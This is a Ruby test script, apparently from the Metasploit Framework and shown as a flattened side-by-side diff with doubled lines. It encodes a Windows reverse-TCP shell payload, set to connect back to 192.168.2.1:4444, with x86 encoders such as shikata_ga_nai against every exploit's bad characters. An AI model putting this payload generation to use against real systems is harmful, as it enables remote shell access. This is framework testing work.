EXPLOITS.each_module do | name, mod | EXPLOITS.each_module do |name, mod|
exploit = mod.new exploit = mod.new
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose print_line("\n#{encoder_name} v #{name} (#{format_badchars(exploit.payload_badchars)})") if verbose
begin begin
encoder = $msf.encoders.create( encoder_name ) encoder = $msf.encoders.create(encoder_name)
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil ) raw = encoder.encode(payload, exploit.payload_badchars, nil, nil)
success += 1 success += 1
rescue rescue
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose print_line(" FAILED! badchars=#{format_badchars(exploit.payload_badchars)}\n") if verbose
fail += 1 fail += 1
end end
end end
return [ success, fail ] return [ success, fail ]
end end
def generate_payload( name ) def generate_payload(name)
payload = $msf.payloads.create(name)
payload = $msf.payloads.create( name )
# set options for a reverse_tcp payload # set options for a reverse_tcp payload
payload.datastore['LHOST'] = '192.168.2.1' payload.datastore['LHOST'] = '192.168.2.1'
payload.datastore['RHOST'] = '192.168.2.254' payload.datastore['RHOST'] = '192.168.2.254'
payload.datastore['RPORT'] = '5432' payload.datastore['RPORT'] = '5432'
payload.datastore['LPORT'] = '4444' payload.datastore['LPORT'] = '4444'
# set options for an exec payload # set options for an exec payload
payload.datastore['CMD'] = 'calc' payload.datastore['CMD'] = 'calc'
# set generic options # set generic options
payload.datastore['EXITFUNC'] = 'thread' payload.datastore['EXITFUNC'] = 'thread'
return payload.generate return payload.generate
end end
def run( encoders, payload_name, verbose=false ) def run(encoders, payload_name, verbose = false)
payload = generate_payload(payload_name)
payload = generate_payload( payload_name )
table = Rex::Text::Table.new( table = Rex::Text::Table.new(
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ), 'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime("%d-%b-%Y %H:%M:%S"),
'Indent' => 4, 'Indent' => 4,
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ] 'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
) )
encoders.each do | encoder_name | encoders.each do |encoder_name|
success, fail = encoder_v_payload(encoder_name, payload, verbose)
success, fail = encoder_v_payload( encoder_name, payload, verbose )
table << [ encoder_name, success, fail ] table << [ encoder_name, success, fail ]
end end
return table return table
end end
if( $0 == __FILE__ ) if ($0 == __FILE__)
print_line( "[+] Starting.\n" ) print_line("[+] Starting.\n")
encoders = [ encoders = [
'x86/bloxor', 'x86/bloxor',
'x86/shikata_ga_nai', 'x86/shikata_ga_nai',
'x86/jmp_call_additive', 'x86/jmp_call_additive',
'x86/fnstenv_mov', 'x86/fnstenv_mov',
'x86/countdown', 'x86/countdown',
'x86/call4_dword_xor' 'x86/call4_dword_xor'
] ]
payload_name = 'windows/shell/reverse_tcp' payload_name = 'windows/shell/reverse_tcp'
verbose = false verbose = false
result_table = run( encoders, payload_name, verbose )
print_line( "\n\n#{result_table.to_s}\n\n" ) result_table = run(encoders, payload_name, verbose)
print_line( "[+] Finished.\n" ) print_line("\n\n#{result_table.to_s}\n\n")
print_line("[+] Finished.\n")
end end